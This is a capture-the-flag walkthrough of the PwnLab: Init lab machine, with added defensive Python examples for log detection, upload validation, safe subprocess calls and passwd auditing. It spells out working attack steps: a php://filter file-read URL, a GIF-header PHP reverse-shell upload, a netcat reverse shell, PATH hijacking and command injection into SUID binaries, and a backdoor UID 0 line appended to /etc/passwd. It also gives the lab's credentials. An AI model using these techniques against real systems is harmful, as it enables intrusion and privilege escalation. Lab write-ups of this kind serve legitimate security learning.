The next machine on the list is Pwnlab-init which can be downloaded here: https://www.vulnhub.com/entry/pwnlab-init,158/
To find the IP address of the machine we used netdiscover on our local network.
The machine should be on the .130 address. Let's start a normal nmap scan and a full nmap scan and have a look at the results:
So we got a couple of ports: 80, 111 and 3306. Let's start the tools Nikto and Dirb on the running web service to do some enumeration. The full nmap scan didn't provide any extra ports. While these are running, let's have a look at port 80 by going to the web address.
Seems like a simple website. We can not upload anything since we have to be logged in. Let's try a simple SQL injection. From the nmap results we already knew there is MySQL running. Inputting
' or 1=1 --
or ' or 1=1 # didn't give us any luck. The ?page parameter looks vulnerable to LFI, but again I didn't have any luck getting to the passwd file or anything.
Nikto and Dirb didn't give us much info either. There is a config file, but we can not read its contents. Feels like we have to do a SQL injection on the website. But first let's have a look at the other services running. I checked the RPC service, but I couldn't connect to it with showmount. No idea how this worked, so I looked it up; still not too familiar with it. Seems like a dead end.
After some reading I found out that we can do the LFI using the PHP filter wrapper described in this blog, which will base64-encode the config file and give us the base64 string, which we can then decode to get the contents of the config file. Let's try this out. By going to the following URL:
http://192.168.0.130/?page=php://filter/convert.base64-encode/resource=config we get the base64 string of the config file.
To easily decode the base64 string we can use CyberChef at https://gchq.github.io/, or we echo the base64 string and pipe it into the base64 command.
echo "PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8" | base64 -d
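From the defender's side, the request above is easy to spot in the web server's access log: the page parameter carries a stream wrapper (php://) where a plain page name should be. Below is an added Python example (my own code, not part of this write-up or the PwnLab machine) that scans a few constructed access-log lines for wrapper and traversal values in the page parameter, and shows the allowlist lookup that replaces a raw include. The log lines, the parameter name and the allowed page names are all assumptions.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample access-log lines (not log data from the machine).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2020:10:00:00 +0000] "GET /?page=login HTTP/1.1" 200 512
192.0.2.10 - - [01/Jan/2020:10:00:05 +0000] "GET /?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 8120
192.0.2.10 - - [01/Jan/2020:10:00:09 +0000] "GET /?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 300
192.0.2.11 - - [01/Jan/2020:10:01:00 +0000] "GET /?page=upload HTTP/1.1" 200 640
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Any scheme followed by :// (php://, data://, expect://, ...) has no business in a page name.
WRAPPER_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)
# ".." as a whole path component, with either separator.
TRAVERSAL_RE = re.compile(r'(^|[/\\])\.\.([/\\]|$)')


def suspicious_page_values(log_text, param="page"):
    """Return (client, decoded value, reason) for every request whose include
    parameter carries a stream wrapper or a directory traversal."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client = line.split(" ", 1)[0]
        query = parse_qs(urlparse(m.group(1)).query)   # parse_qs percent-decodes the values
        for value in query.get(param, []):
            if WRAPPER_RE.match(value):
                hits.append((client, value, "stream wrapper"))
            elif TRAVERSAL_RE.search(value):
                hits.append((client, value, "path traversal"))
    return hits


# Assumed allowlist of pages the application actually has.
ALLOWED_PAGES = {"index", "login", "upload"}


def resolve_page(value):
    """Allowlist lookup that replaces include($_GET['page'] . '.php'):
    anything not on the list resolves to None instead of a file path."""
    return value + ".php" if value in ALLOWED_PAGES else None


if __name__ == "__main__":
    for client, value, reason in suspicious_page_values(SAMPLE_LOG):
        print(f"{client}: {reason}: {value}")
```

The allowlist is the real fix: once the page parameter can only select from a fixed set of names, wrappers and traversal sequences never reach include(). The log scan is the detective control for a site you cannot patch right away.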
Seems like we got the username and password for the MySQL database, which is root:H4u%QJ_H99. Can we use this to log in to the website as well? Nope, this is not possible. By using the command
mysql -h 192.168.0.130 -u root -p and the password we could log in to the MySQL server.
It has been a while since I used mysql and I had a look around, so you can see the commands and output below without a ton of errors in between:
MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [Users]> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.000 sec)

MySQL [Users]> select * from users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.000 sec)
So we got 3 values, which seem to be base64 encoded since there is a == at the end. Let's base64 decode them as we did above and have a look whether they look like passwords or not.
Kane:iSv5Ym2GRo. Seems valid, let's try it.
We are logged in and greeted with an upload functionality.
Let's copy a PHP reverse shell and change its contents to connect to our IP and port 8080.
cp /usr/share/webshells/php/php-reverse-shell.php ~/pwnlabinit/
Let's upload this file and we get the error "Not allowed extension, please upload images only." So we can try a couple of things. Let's try a .png.php file, which also failed. Aah ye, I still need to set up Burp. Let's do this quickly: install the certificate, FoxyProxy etc. After setting it up, let's see if we can just upload the .php file and change the request to look like it's a .png or something. I think I have to change these values:
So let's upload a PNG file and see what the Content-Type looks like, so we can use that when we intercept the upload of the PHP file. The PNG upload shows the following:
So let's upload the PHP file and change the Content-Type to image/png. But since Burp is using port 8080 now, we had to change the reverse shell to port 443 and start a listener with the command
nc -lvp 443. So let's upload the file and see. We still get the error "Not allowed extension, please upload images only."
Apparently if you upload the file with
GIF87a in front of the PHP tag, it passes the header check, which thinks it is a GIF image. Like the screenshot below:
When you open the file in the /upload/ directory you get an error, because the browser thinks the image is corrupt. You can not run it this way. It took me quite some time and I had to look up some help. But the lang cookie is vulnerable, since its value is used in an include statement, which runs whatever file you point it at.
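Two separate weaknesses combine here: the upload check only looks at the first bytes of the file, and a cookie value ends up in include(). The added Python example below (my own code, not from this write-up or the machine) shows how a GIF87a-prefixed PHP file sails through a magic-bytes-only check, and what a stricter validator looks like: the final extension, the declared Content-Type and the magic bytes all have to agree, a PHP open tag anywhere in the body is rejected, and the file is stored under a server-chosen name. The sample file contents, the extension table and the function names are assumptions.

```python
import os
import secrets

# Constructed sample uploads (not files from the machine).
REAL_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
POLYGLOT_GIF = b"GIF87a\n<?php echo 'hello'; ?>\n"   # GIF header followed by PHP code

# Assumed table of accepted image types: extension -> (magic bytes, Content-Type).
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}
CONTENT_TYPES = {".png": "image/png", ".gif": "image/gif", ".jpg": "image/jpeg", ".jpeg": "image/jpeg"}
PHP_TAGS = (b"<?php", b"<?=")


def naive_check(data):
    """The kind of check the upload form ran: accept anything that starts like an image."""
    return any(data.startswith(magics) for magics in MAGIC.values())


def validate_upload(filename, content_type, data):
    """Return (ok, reason). Every signal about the file type must agree, and the
    body must not contain a PHP open tag even when it looks like an image."""
    ext = os.path.splitext(filename)[1].lower()   # final extension only: 'x.png.php' -> '.php'
    if ext not in MAGIC:
        return False, "extension not allowed"
    if content_type != CONTENT_TYPES[ext]:
        return False, "content-type does not match extension"
    if not data.startswith(MAGIC[ext]):
        return False, "magic bytes do not match extension"
    if any(tag in data for tag in PHP_TAGS):
        return False, "embedded PHP open tag"
    return True, "ok"


def stored_name(ext):
    """Server-chosen file name: the client never decides what lands on disk."""
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    print("naive check accepts polyglot:", naive_check(POLYGLOT_GIF))
    print(validate_upload("shell.gif", "image/gif", POLYGLOT_GIF))
    print(validate_upload("avatar.png", "image/png", REAL_PNG), stored_name(".png"))
```

Even with this validator in place, the include on the lang cookie is the bug that turns an uploaded file into code execution: uploaded content should only ever be served from a directory where script execution is disabled, and a cookie value should select a language from a fixed list, never a path.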
We got a reverse shell as the www-data user.
We have no tty control, so let's spawn a tty shell. The command
python -c 'import pty; pty.spawn("/bin/sh")' worked for me. So after looking around a bit, I found the same usernames. Would these work with the passwords we found earlier?
Kent works but nothing interesting, Mike didn't work, and in Kane's home directory there is an executable named msgmike with Mike as the owner and group.
The ./msgmike executable is executing cat. I had no idea how to exploit this, so I googled and came across the following: https://www.pentestpartners.com/security-blog/exploiting-suid-executables/. Since we control the PATH variable, we can change it so it executes another executable as the user Mike, since the SUID bit is set and Mike is the owner. Let's save the current $PATH variable since we have to set it back afterwards in case we need to do something else.
We make an executable named cat whose contents spawn a shell:
echo "/bin/bash" > cat && chmod +x cat. After that we change the PATH to . (the current directory) with the following command:
export PATH=. and then we run msgmike again and we are Mike. NICE!
Now we have to change the PATH variable back since we can not do anything. So we do
export PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games and we can use commands again. In the home directory of Mike there is another executable, owned by root with the SUID bit set. Do we have to do the same? Let's run it and have a look.
Doesn't seem like we have to use the same vulnerability. What a bummer. So after looking into the executable with strings I saw the following:
Seems like it is executing echo from the /bin directory, meaning we can not change the PATH variable like before. However it is inserting our input into the %s spot (I think). So I tried putting the following as the message:
&& echo "test" > /tmp/test.txt making the whole command
/bin/echo %s && echo "test" > /tmp/test.txt >> /root/messages.txt. And it made the test.txt file in /tmp, owned by root.
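Both SUID binaries fail the same way: they hand a string to system(), so the shell resolves cat through the caller's PATH in the first case and parses && in the second. The added Python example below (my own code, not from this write-up or the machine) shows the defensive side of both: a check that flags a PATH a privileged program should not trust, the string-splicing that lets metacharacters through, the shlex-quoted variant, and the argv-list execution with an absolute path and a fixed environment where the message is only ever an argument. Function names, the sample messages and the PATH value are assumptions; the /bin/echo invocation assumes a Unix-like host.

```python
import os
import shlex
import subprocess

# Assumed fixed PATH a privileged program would set for itself instead of inheriting one.
SAFE_PATH = "/usr/local/bin:/usr/bin:/bin"


def path_is_safe(path_value):
    """Reject PATH values a SUID program must not inherit: empty entries
    (which mean the current directory), '.', or any relative directory."""
    return all(entry and os.path.isabs(entry) for entry in path_value.split(":"))


def build_shell_command(message):
    """What a system()-based binary does: splice the message into a shell string.
    Shell metacharacters in the message survive and are interpreted by /bin/sh."""
    return f"/bin/echo {message} >> /root/messages.txt"


def build_quoted_shell_command(message):
    """If a shell string is unavoidable, quote the message so it becomes one argument."""
    return f"/bin/echo {shlex.quote(message)} >> /root/messages.txt"


def echo_message(message):
    """Exec the program by absolute path with an argv list and a fixed environment:
    no shell parses the message and PATH cannot redirect the lookup."""
    result = subprocess.run(
        ["/bin/echo", message],
        capture_output=True,
        text=True,
        env={"PATH": SAFE_PATH},
        check=True,
    )
    return result.stdout.rstrip("\n")


if __name__ == "__main__":
    sample = "hi && echo injected"   # constructed message with a shell operator in it
    print("PATH '.' safe?", path_is_safe("."))
    print("spliced:", build_shell_command(sample))
    print("quoted: ", build_quoted_shell_command(sample))
    print("argv:   ", echo_message(sample))
```

Run as argv, the whole message is a single argument and echo prints it literally; in the spliced string the same text contains two commands. Setting the environment explicitly (or calling setuid binaries with a sanitized environment) closes the PATH trick the first binary fell for.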
Now we have to think of a payload to get root access. We can probably do a reverse shell. Lets try this:
&& nc 192.168.0.129 4444 -e /bin/bash &&. But first start a listener on our machine with
nc -lvp 4444, but this did not work! We got a shell as mike.
Dammn, then you FUCK up the whole machine by overwriting
/etc/passwd instead of appending. RIP. After reverting the machine and doing the exploits above again, we are the user Mike again… Now let's retry echoing a new line to the passwd file with the following message
&& echo "roott::0:0:root:/root:/bin/bash" >> /etc/passwd &&. But to be sure, let's snapshot the machine quickly. Execute the message and have a look at the /etc/passwd file.
Ye right, the password for mike was incorrect when we tried to log in with it. So we have to add a line for mike that doesn't have a password, I guess. Let's try :D. We still got a failure. Let's go back to Kane and try
su? Hmm, seems not possible. After some googling I found the following on Stack Overflow:
So after redoing it with a hash instead of an empty password we got root 😀 This took me quite some time, but I learned a lot about exploiting vulnerable executables. Never did this before! Was fun!
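The lines appended to /etc/passwd above are exactly what a file-integrity or host audit should catch: a second UID 0 account, an empty password field, and a hash sitting in passwd rather than shadow. The added Python example below (my own code, not from this write-up or the machine) audits a constructed passwd file for those three conditions plus malformed or duplicate entries. The file contents, the placeholder hash and the function name are assumptions.

```python
# Constructed /etc/passwd content: two ordinary accounts, then two entries of the kind
# a local-root backdoor leaves behind. The hash on the last line is a placeholder, not real.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mike:x:1001:1001:Mike,,,:/home/mike:/bin/bash
roott::0:0:root:/root:/bin/bash
helper:$1$abc$PLACEHOLDERHASH:0:0::/root:/bin/sh
"""

# Password-field values that mean "look in /etc/shadow" or "locked"; anything else is suspicious.
SHADOWED = {"x", "*", "!", "!!"}


def audit_passwd(text):
    """Return (line number, finding) for every entry that should not be in a healthy passwd file."""
    findings = []
    seen = set()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, "malformed entry"))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if name in seen:
            findings.append((lineno, f"{name}: duplicate username"))
        seen.add(name)
        if pw == "":
            findings.append((lineno, f"{name}: empty password field"))
        elif pw not in SHADOWED:
            findings.append((lineno, f"{name}: password hash stored in passwd instead of shadow"))
        if uid == "0" and name != "root":
            findings.append((lineno, f"{name}: UID 0 account other than root"))
    return findings


if __name__ == "__main__":
    for lineno, finding in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {finding}")
```

The empty-password entry failing to log in, as it did in the write-up, is pam_unix's default behaviour of refusing empty passwords unless nullok is configured; that is why the entry with a hash worked where the empty one did not, and why both shapes deserve an alert.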